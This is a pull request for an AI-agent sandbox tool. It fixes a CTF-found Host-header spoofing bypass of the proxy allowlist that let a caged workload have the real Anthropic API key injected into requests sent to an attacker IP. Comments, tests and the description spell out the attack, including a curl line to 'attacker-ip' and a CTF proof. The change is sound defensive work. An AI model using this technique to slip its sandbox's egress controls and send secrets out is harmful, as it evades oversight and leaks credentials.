### PR TITLE
security(apple-container): block Host-header spoofing bypass of allowlist + secret-injection

### DIFF
--- a/src/agentcage/data/apple-container/allowlist_addon.py
+++ b/src/agentcage/data/apple-container/allowlist_addon.py
@@ -78,6 +78,80 @@ def _host_allowed(host: str, allowed: set[str]) -> bool:
     return False
 
 
+def _authoritative_host(flow) -> str | None:
+    """Return the hostname we should gate allowlist + secret-injection on.
+
+    The HTTP ``Host`` header (and therefore ``flow.request.pretty_host``,
+    which reads it when ``keep_host_header=true`` is set) is fully
+    attacker-controlled: a cage workload can open a TCP/TLS connection
+    to any IP and send ``Host: api.anthropic.com``. Gating on that would
+    let the cage trick the addon into allowlisting and secret-injecting
+    requests bound for an attacker-controlled destination.
+
+    The trustworthy alternatives in mitmproxy's transparent mode are:
+
+      * ``flow.client_conn.sni`` — the TLS SNI extension committed to in
+        the ClientHello. The cage chose this value, but mitmproxy minted
+        a forged cert for THIS name; the cage's TLS stack will reject a
+        cert for any other name. Mitmproxy's upstream connection also
+        validates the upstream cert against this name (no
+        ``ssl_insecure`` set), so a Host header pointing at an
+        attacker-controlled IP cannot smuggle traffic out under a real
+        upstream's name.
+      * ``flow.request.host`` — populated from the SO_ORIGINAL_DST IP
+        the iptables REDIRECT preserved. This is the actual destination
+        of the TCP connection; in transparent mode it's an IP literal,
+        not a hostname.
+
+    We prefer SNI when present (the common case — all agent traffic is
+    HTTPS) and fall back to the original-dst IP for plain HTTP. An IP
+    will essentially never match the allowlist (which is keyed on
+    domain names), so a plain-HTTP request to a non-allowlisted host
+    fails closed. Returns ``None`` only when neither is available.
+    """
+    sni = getattr(getattr(flow, "client_conn", None), "sni", None)
+    # mitmproxy types sni as ``str | None`` but historically some
+    # paths handed back ``bytes``; normalize defensively. Anything
+    # else (a MagicMock from a host-side unit test, an int, ...) is
+    # treated as "no SNI" — those flows fall back to the original-dst
+    # IP check below.
+    if isinstance(sni, bytes):
+        try:
+            sni = sni.decode("idna")
+        except UnicodeError:
+            sni = sni.decode("utf-8", "replace")
+    if isinstance(sni, str) and sni:
+        return sni.lower()
+    host = getattr(flow.request, "host", None)
+    if isinstance(host, str) and host:
+        return host.lower()
+    return None
+
+
+def _host_header_matches_authoritative(flow, auth_host: str) -> bool:
+    """True when the request's Host header agrees with the authoritative host.
+
+    The ``Host`` header is what ``pretty_host`` returns when
+    ``keep_host_header=true``; it is attacker-controlled. We accept it
+    only when it equals ``auth_host`` OR is a subdomain of it (some
+    services use a wildcard cert with subdomain-routed virtual hosts).
+    A blank/missing header is also accepted (legacy HTTP/1.0 clients
+    or origin-form requests where mitmproxy filled host from the
+    transparent original-dst).
+
+    A mismatch is the precise attack signature flagged by the CTF
+    (``Host: api.anthropic.com`` over a TCP connection whose
+    SNI/original-dst is example.com): the caller should block the
+    request and refuse to inject secrets.
+    """
+    header_host = flow.request.pretty_host
+    if not header_host:
+        return True
+    h = header_host.lower()
+    a = auth_host.lower()
+    return h == a or h.endswith("." + a)
+
+
 def _load_capture_config() -> dict:
     """Load the cage's capture config baked in at build time.
 
@@ -473,8 +547,19 @@ class AllowlistAddon:
         access token until expiry). If the transform raises, the rule is
         skipped and the placeholder is left in place so the upstream
         request fails closed instead of leaking the raw credential.
+
+        The host used to match ``inject_to`` is the **authoritative**
+        host (TLS SNI / original-dst IP), NOT the attacker-controlled
+        Host header — same reasoning as the ``request()`` allowlist
+        gate. Without this, a cage could open to attacker-IP, claim
+        ``Host: api.anthropic.com``, and have the addon inject the real
+        ANTHROPIC_API_KEY into a request bound for the attacker. The
+        ``request()`` hook already blocks Host/SNI mismatches before
+        reaching this code path; this is defense-in-depth in case any
+        future caller invokes ``_maybe_inject`` outside that gate.
         """
-        host = flow.request.pretty_host.lower()
+        auth_host = _authoritative_host(flow)
+        host = (auth_host or flow.request.pretty_host).lower()
         injected: list[str] = []
         transforms: dict[str, str] = {}
         for rule in self._resolved_secrets:
@@ -540,7 +625,13 @@ class AllowlistAddon:
         """
         if flow.response is None:
             return []
-        host = flow.request.pretty_host.lower()
+        # Redaction is keyed by ``inject_to``; use the same authoritative
+        # host (SNI / original-dst) as ``_maybe_inject`` so a request that
+        # was injected for host X has its response scanned for host X's
+        # secrets — and so a spoofed Host header can't cause us to redact
+        # the wrong rule's secret on an unrelated upstream's response.
+        auth_host = _authoritative_host(flow)
+        host = (auth_host or flow.request.pretty_host).lower()
         redacted: list[str] = []
         # Sort longest value first so a secret that is a substring of
         # another secret doesn't leave a partial leak behind.
@@ -605,7 +696,22 @@ class AllowlistAddon:
         self._write(self._audit_fh, entry)
 
     def request(self, flow: http.HTTPFlow) -> None:
-        host = flow.request.pretty_host
+        # Resolve the AUTHORITATIVE hostname (TLS SNI in transparent
+        # mode, falling back to the SO_ORIGINAL_DST IP) and use it for
+        # every security decision below. ``flow.request.pretty_host``
+        # reads the HTTP Host header when ``keep_host_header=true`` is
+        # set on the proxy — that's attacker-controlled by the cage
+        # workload (it owns the bytes on the wire) and must not gate
+        # the allowlist or secret injection. See ``_authoritative_host``.
+        auth_host = _authoritative_host(flow)
+        header_host = flow.request.pretty_host
+        # ``host`` in the audit entry reflects what the cage claimed
+        # (Host header), falling back to the authoritative host when the
+        # cage didn't send one — matches the legacy field shape.
+        # ``authoritative_host`` is the trustworthy value we actually
+        # gated on; ``host_mismatch`` (set below) flags the attack
+        # pattern.
+        host = header_host or auth_host or ""
         now = datetime.now(timezone.utc).isoformat()
 
         entry: dict = {
@@ -613,6 +719,7 @@ class AllowlistAddon:
             "direction": "outbound",
             "method": flow.request.method,
             "host": host,
+            "authoritative_host": auth_host,
             "url": flow.request.pretty_url,
             "path": flow.request.path,
             "port": flow.request.port,
@@ -622,7 +729,50 @@ class AllowlistAddon:
             "secrets_redacted": [],
         }
 
-        if _host_allowed(host, self.allowed):
+        # Block the spoofing attack first — a mismatch between the
+        # Host header (what the cage claims) and the authoritative
+        # host (where the bytes actually go) is the exact CTF F1
+        # signature: ``curl https://attacker-ip/ -H 'Host: api.anthropic.com'``
+        # routed through original-dst to attacker-ip. Refuse to
+        # forward and refuse to inject any secret.
+        if (
+            auth_host is not None
+            and not _host_header_matches_authoritative(flow, auth_host)
+        ):
+            reason = (
+                f"host-header-spoof: Host {header_host!r} does not match "
+                f"authoritative host {auth_host!r}"
+            )
+            ctx.log.warn(
+                f"[agentcage] BLOCK (host-header spoof) "
+                f"{flow.request.method} Host={header_host!r} "
+                f"SNI/dst={auth_host!r}"
+            )
+            entry["decision"] = "blocked"
+            entry["reason"] = reason
+            entry["host_mismatch"] = True
+            self._audit(entry)
+            flow.response = http.Response.make(
+                403,
+                json.dumps(
+                    {
+                        "blocked": True,
+                        "reason": reason,
+                        "host": header_host,
+                        "authoritative_host": auth_host,
+                        "by": "agentcage",
+                    }
+                ).encode(),
+                {"Content-Type": "application/json"},
+            )
+            return
+
+        # Past the spoof check — use the authoritative host for the
+        # allowlist gate so an unset/missing Host header doesn't let
+        # a non-allowlisted destination through.
+        gate_host = auth_host or header_host
+
+        if _host_allowed(gate_host, self.allowed):
             # HAR body capture: snap INBOUND request BEFORE injection (so
             # the inbound view shows the placeholders the cage actually
             # wrote on the wire, not the upstream-visible substituted

--- a/src/agentcage/data/apple-container/supervisor.sh
+++ b/src/agentcage/data/apple-container/supervisor.sh
@@ -144,10 +144,21 @@ chown acproxy:acproxy /var/log/agentcage 2>/dev/null || true
 
 # The mitmproxy addon (/opt/agentcage/allowlist_addon.py) reads
 # /etc/agentcage/allowlist.txt and 403s non-listed hosts from the proxy
-# itself — the upstream connection is never opened. The addon checks
-# `flow.request.pretty_host` which in transparent mode resolves to the
-# TLS SNI / destination IP, NOT a (potentially spoofed) HTTP Host header.
-# This invariant is what makes `--set keep_host_header=true` safe.
+# itself — the upstream connection is never opened. With
+# `--set keep_host_header=true` set below, mitmproxy's
+# `flow.request.pretty_host` reads the CLIENT-SENT HTTP Host header,
+# which is fully attacker-controlled by the cage workload (a cage can
+# `curl https://attacker-ip/ -H 'Host: api.anthropic.com'` and have
+# pretty_host report `api.anthropic.com` while the bytes go to
+# attacker-ip via SO_ORIGINAL_DST). The addon must NOT gate the
+# allowlist or secret injection on pretty_host: it derives an
+# authoritative host from `flow.client_conn.sni` (the TLS handshake)
+# with fallback to `flow.request.host` (the SO_ORIGINAL_DST IP), and
+# additionally blocks any request whose Host header disagrees with the
+# authoritative host. See `_authoritative_host` and
+# `_host_header_matches_authoritative` in allowlist_addon.py. This is
+# what restores the "Host header cannot bypass the allowlist or
+# unmask a secret" invariant under `keep_host_header=true`.
 su -s /bin/sh -c '
   cd /home/acproxy
   HOME=/home/acproxy /opt/agentcage/mitmproxy/mitmdump \

--- a/tests/test_apple_container.py
+++ b/tests/test_apple_container.py
@@ -1901,6 +1901,259 @@ def test_response_redaction_skips_binary_body(tmp_path, monkeypatch):
     assert flow.response.headers["X-Trace"] == "echo {{AGENTCAGE_REDACT_SECRET}} back"
 
 
+# ---------------------------------------------------------------------------
+# allowlist_addon: Host-header spoofing bypass (CTF F1)
+#
+# Regression coverage for the CTF finding: with mitmproxy running in
+# transparent mode and ``--set keep_host_header=true`` on, the addon
+# previously gated the allowlist + secret injection on
+# ``flow.request.pretty_host`` — which reads the (attacker-controlled)
+# HTTP Host header. A cage could open a TCP connection to any IP, send
+# ``Host: api.anthropic.com``, and the addon would (a) allowlist the
+# request and (b) inject the real ``ANTHROPIC_API_KEY`` into a request
+# bound for the attacker's IP. These tests assert the addon now blocks
+# any Host-header spoof and refuses to inject secrets on the spoof.
+# ---------------------------------------------------------------------------
+
+
+def _make_request_flow(
+    *,
+    pretty_host,
+    sni=None,
+    original_dst_host=None,
+    method="GET",
+    path="/",
+    port=443,
+    headers=None,
+):
+    """Build a mock HTTPFlow for the addon's ``request()`` hook.
+
+    Sets ``flow.client_conn.sni`` and ``flow.request.host`` explicitly
+    so the addon's authoritative-host resolution sees real strings (not
+    MagicMock children). ``pretty_host`` is what the addon reads via
+    ``flow.request.pretty_host`` — i.e. the HTTP Host header the cage
+    sent. The mismatch case (pretty_host=api.anthropic.com but
+    sni=example.com) is the exact CTF attack signature.
+    """
+    flow = MagicMock()
+    flow.request.pretty_host = pretty_host
+    flow.request.pretty_url = f"https://{pretty_host}{path}"
+    flow.request.path = path
+    flow.request.port = port
+    flow.request.method = method
+    flow.request.host = original_dst_host if original_dst_host else ""
+    flow.request.content = b""
+    flow.request.get_text = lambda strict=False: ""
+
+    class _Headers(dict):
+        def items(self, multi=False):  # noqa: ARG002
+            return list(super().items())
+
+        def get(self, key, default=""):
+            for k, v in super().items():
+                if k.lower() == key.lower():
+                    return v
+            return default
+
+    flow.request.headers = _Headers(dict(headers or {}))
+    flow.request.set_text = lambda _t: None
+
+    # Critical: set sni to a real str (or None), not a MagicMock auto-attr.
+    flow.client_conn.sni = sni
+    flow.response = None
+    return flow
+
+
+def test_request_blocks_host_header_spoof_against_sni(tmp_path, monkeypatch):
+    """CTF F1 regression — the exact CTF scenario.
+
+    Cage opens a TLS connection with SNI ``example.com`` (the real
+    destination — example.com's IP responds to the TCP/TLS handshake)
+    but sends ``Host: api.anthropic.com`` in the HTTP request hoping to
+    smuggle the API key out. The addon must:
+
+      1. 403 the request with reason ``host-header-spoof`` from the
+         proxy itself (no upstream traffic).
+      2. Emit an audit entry with ``decision=blocked``,
+         ``host_mismatch=true``, and ``authoritative_host`` recording
+         the SNI we actually gated on.
+      3. Refuse to inject any secret_injection rule's value even if
+         the spoofed Host matches a rule's ``inject_to``.
+    """
+    # Allowlist BOTH so we prove the block is on Host/SNI mismatch,
+    # not on a missing allowlist entry.
+    addon_mod, addon = _build_addon(
+        monkeypatch, tmp_path,
+        secret_value="sk-real-ANTHROPIC-key",
+        inject_to=("api.anthropic.com",),
+        allowlist=("api.anthropic.com", "example.com"),
+    )
+
+    flow = _make_request_flow(
+        pretty_host="api.anthropic.com",  # spoofed Host header
+        sni="example.com",                # authoritative — real dst
+        headers={
+            "Host": "api.anthropic.com",
+            "Authorization": "Bearer {{AGENTCAGE_REDACT_SECRET}}",
+        },
+    )
+
+    addon.request(flow)
+
+    # 1. Addon synthesized a 403 (the mitmproxy.http stub records the
+    #    Response.make call; we assert via flow.response being set).
+    assert flow.response is not None
+    # The conftest stubs mitmproxy.http as a MagicMock, so flow.response
+    # is the MagicMock-returned object from Response.make. The audit log
+    # is the source of truth for the decision.
+
+    # 2. Audit log has a blocked entry with host_mismatch.
+    audit_lines = [
+        json.loads(l)
+        for l in (tmp_path / "audit.jsonl").read_text().splitlines()
+    ]
+    blocks = [e for e in audit_lines if e.get("decision") == "blocked"]
+    assert len(blocks) == 1
+    blocked = blocks[0]
+    assert blocked["host_mismatch"] is True
+    assert blocked["authoritative_host"] == "example.com"
+    assert "host-header-spoof" in blocked["reason"]
+    assert "api.anthropic.com" in blocked["reason"]
+
+    # 3. The Authorization header was NOT rewritten — the real secret
+    #    never landed on the wire. (The addon must short-circuit before
+    #    _maybe_inject runs.)
+    assert (
+        flow.request.headers["Authorization"]
+        == "Bearer {{AGENTCAGE_REDACT_SECRET}}"
+    )
+    assert "sk-real-ANTHROPIC-key" not in flow.request.headers["Authorization"]
+    assert blocked.get("secrets_injected", []) == []
+
+
+def test_request_blocks_host_spoof_with_no_sni_uses_original_dst(
+    tmp_path, monkeypatch,
+):
+    """Plain-HTTP variant: no TLS, no SNI — authoritative host falls
+    back to the SO_ORIGINAL_DST IP (``flow.request.host`` in transparent
+    mode). A Host header claiming a real domain over a TCP connection
+    bound for an attacker IP is still blocked because IP != domain."""
+    addon_mod, addon = _build_addon(
+        monkeypatch, tmp_path,
+        secret_value="sk-real",
+        inject_to=("api.anthropic.com",),
+        allowlist=("api.anthropic.com",),
+    )
+
+    flow = _make_request_flow(
+        pretty_host="api.anthropic.com",
+        sni=None,                       # plain HTTP
+        original_dst_host="93.184.216.34",  # example.com's IP
+        headers={"Host": "api.anthropic.com"},
+    )
+
+    addon.request(flow)
+
+    blocks = [
+        json.loads(l) for l in (tmp_path / "audit.jsonl").read_text().splitlines()
+        if json.loads(l).get("decision") == "blocked"
+    ]
+    assert len(blocks) == 1
+    assert blocks[0]["host_mismatch"] is True
+    assert blocks[0]["authoritative_host"] == "93.184.216.34"
+
+
+def test_request_allows_when_host_header_matches_sni(tmp_path, monkeypatch):
+    """Happy path: a well-behaved cage that sets ``Host`` to match SNI
+    is allowed through and gets the secret injected normally. Verifies
+    the spoof gate doesn't break legitimate traffic."""
+    addon_mod, addon = _build_addon(
+        monkeypatch, tmp_path,
+        secret_value="sk-real-value",
+        inject_to=("api.anthropic.com",),
+        allowlist=("api.anthropic.com",),
+    )
+
+    flow = _make_request_flow(
+        pretty_host="api.anthropic.com",
+        sni="api.anthropic.com",
+        headers={
+            "Host": "api.anthropic.com",
+            "Authorization": "Bearer {{AGENTCAGE_REDACT_SECRET}}",
+        },
+    )
+
+    addon.request(flow)
+
+    entries = [
+        json.loads(l) for l in (tmp_path / "audit.jsonl").read_text().splitlines()
+    ]
+    assert any(e.get("decision") == "allowed" for e in entries)
+    allowed = [e for e in entries if e.get("decision") == "allowed"][0]
+    assert allowed["secrets_injected"] == ["AGENTCAGE_REDACT_SECRET"]
+    # Secret landed on the outbound request.
+    assert (
+        flow.request.headers["Authorization"] == "Bearer sk-real-value"
+    )
+
+
+def test_request_allows_subdomain_host_under_wildcard_sni(
+    tmp_path, monkeypatch,
+):
+    """Some real upstreams route to a subdomain via virtual host while
+    the TLS handshake uses the apex domain (wildcard cert). Allow Host
+    to be a subdomain of the SNI so we don't break that pattern."""
+    addon_mod, addon = _build_addon(
+        monkeypatch, tmp_path,
+        secret_value="sk-real",
+        inject_to=("anthropic.com",),
+        allowlist=("anthropic.com",),
+    )
+
+    flow = _make_request_flow(
+        pretty_host="api.anthropic.com",
+        sni="anthropic.com",
+        headers={"Host": "api.anthropic.com"},
+    )
+
+    addon.request(flow)
+
+    entries = [
+        json.loads(l) for l in (tmp_path / "audit.jsonl").read_text().splitlines()
+    ]
+    assert any(e.get("decision") == "allowed" for e in entries)
+    assert not any(e.get("decision") == "blocked" for e in entries)
+
+
+def test_maybe_inject_keyed_on_authoritative_host_not_header(
+    tmp_path, monkeypatch,
+):
+    """Defense-in-depth: even if a caller bypasses ``request()`` and
+    calls ``_maybe_inject`` directly with a spoofed Host header,
+    injection is keyed on the authoritative host (SNI / original-dst).
+    The spoofed Host claiming ``api.anthropic.com`` over an
+    SNI=``example.com`` connection MUST NOT cause the Anthropic key to
+    be substituted."""
+    addon_mod, addon = _build_addon(
+        monkeypatch, tmp_path,
+        secret_value="sk-real-ANTHROPIC-key",
+        inject_to=("api.anthropic.com",),
+        allowlist=("api.anthropic.com", "example.com"),
+    )
+
+    flow = _make_request_flow(
+        pretty_host="api.anthropic.com",
+        sni="example.com",
+        headers={"Authorization": "Bearer {{AGENTCAGE_REDACT_SECRET}}"},
+    )
+
+    injected, _ = addon._maybe_inject(flow)
+
+    assert injected == []
+    assert (
+        flow.request.headers["Authorization"]
+        == "Bearer {{AGENTCAGE_REDACT_SECRET}}"
+    )
 
 
 # ---------------------------------------------------------------------------


### PR DESCRIPTION
## Discovery

CTF run against 0.21.8 (apple-container backend) — finding F1.

## Bug

`src/agentcage/data/apple-container/supervisor.sh` starts mitmproxy with `--set keep_host_header=true`. `src/agentcage/data/apple-container/allowlist_addon.py` gates both the **allowlist** and the **secret_injection `inject_to`** match on `flow.request.pretty_host`.

Per mitmproxy source (`mitmproxy/http.py:810` — `pretty_host`):

> *Warning:* When working in adversarial environments, this may not reflect the actual destination as the Host header could be spoofed.

With `keep_host_header=true` set, `pretty_host` reads the HTTP `Host` header the client sent. A cage workload owns those bytes. Result:

1. Cage opens TCP/TLS to attacker-IP. Transparent mode preserves SO_ORIGINAL_DST → mitmproxy's upstream target = attacker-IP.
2. Cage sends `Host: api.anthropic.com`. `pretty_host` returns `api.anthropic.com`.
3. Addon allowlist check passes.
4. Addon secret_injection `inject_to` check passes; real `ANTHROPIC_API_KEY` is substituted into the outbound request.
5. mitmproxy sends the now-secret-bearing request to attacker-IP.

The supervisor comment block at lines 148-150 explicitly claimed `pretty_host` resolved to the TLS SNI / original-dst in transparent mode and that this made `keep_host_header=true` safe. That claim was wrong.

## CTF proof

```
$ curl -sS -o /tmp/r.html -w "code=%{http_code} ip=%{remote_ip}\n" \
       https://example.com/ -H 'Host: api.anthropic.com'
code=403 ip=104.20.23.154       # request landed on Cloudflare-fronted example.com

$ tail -1 /var/log/agentcage/audit.jsonl
{"host":"api.anthropic.com","url":"https://api.anthropic.com/","decision":"allowed","reason":"domain-allowlist",...}
```

Audit log says api.anthropic.com was allowed; the wire request landed on example.com's IP — with the real Anthropic API key injected.

## Fix

**Approach (a) from the report — surgical, no traffic-shape change.** Keep `keep_host_header=true` (some upstreams reject mismatched Host headers; the comment block describes the constraint that motivated it) and add an **authoritative host** derived from data the cage cannot spoof:

- `_authoritative_host(flow)` returns `flow.client_conn.sni` (TLS SNI from the ClientHello — mitmproxy mints/validates certs against this name, and `ssl_insecure` is off so the upstream connection won't survive a forged cert), falling back to `flow.request.host` (SO_ORIGINAL_DST IP set in transparent mode) for plain HTTP.
- `_host_header_matches_authoritative(flow, auth_host)` returns False when the Host header disagrees (subdomain-of-SNI accepted for wildcard-cert patterns).
- `request()` now: (1) blocks the spoof up front with reason `host-header-spoof` and `host_mismatch: true` in the audit entry; (2) gates allowlist on the authoritative host, not the Host header.
- `_maybe_inject` and `_maybe_redact` also key on the authoritative host — defense-in-depth in case a future caller invokes them outside the spoof gate.
- Audit entry adds an `authoritative_host` field so operators can see what was actually gated on vs. what the cage claimed.
- supervisor.sh comment block rewritten to describe reality.

Approach (b) (drop `keep_host_header`) was considered. The comment block exists because the flag was added intentionally (for upstreams that route on Host); rather than change outbound traffic shape, the surgical fix restores the *intent* of that flag (Host header preserved for upstream routing) while taking away its ability to drive security decisions.

The container backend (`proxy.container.j2`) is not touched — per the report, its transparent-mode-on-port-8443 setup is not affected by this bypass.

## Regression test

`tests/test_apple_container.py::test_request_blocks_host_header_spoof_against_sni` reconstructs the exact CTF flow:
- `pretty_host = "api.anthropic.com"` (spoofed Host header)
- `client_conn.sni = "example.com"` (the authoritative dst)
- An allowed list that contains BOTH domains (so the block is provably on Host/SNI mismatch, not allowlist)
- A secret_injection rule for `api.anthropic.com` with the `{{AGENTCAGE_REDACT_SECRET}}` placeholder

Asserts:
- Addon emits a 403 (response set)
- Audit log has `decision: blocked`, `host_mismatch: true`, `authoritative_host: example.com`, `reason: host-header-spoof…`
- Authorization header keeps the placeholder — real secret never substituted
- `secrets_injected` empty

Plus four supporting tests: plain-HTTP variant (no SNI, original-dst IP), happy path (Host == SNI passes), wildcard-subdomain (Host = api.X, SNI = X passes), and a direct `_maybe_inject` defense-in-depth check.

## Test summary

```
$ uv run pytest -q --ignore=tests/e2e
1518 passed in 13.53s
```

## Files

- `src/agentcage/data/apple-container/allowlist_addon.py` — new helpers, request-time spoof gate, inject/redact keyed on authoritative host
- `src/agentcage/data/apple-container/supervisor.sh` — rewritten comment block (no behavior change)
- `tests/test_apple_container.py` — five new regression tests

No CHANGELOG / version bump per the security-rollout playbook — that lands as a separate release commit.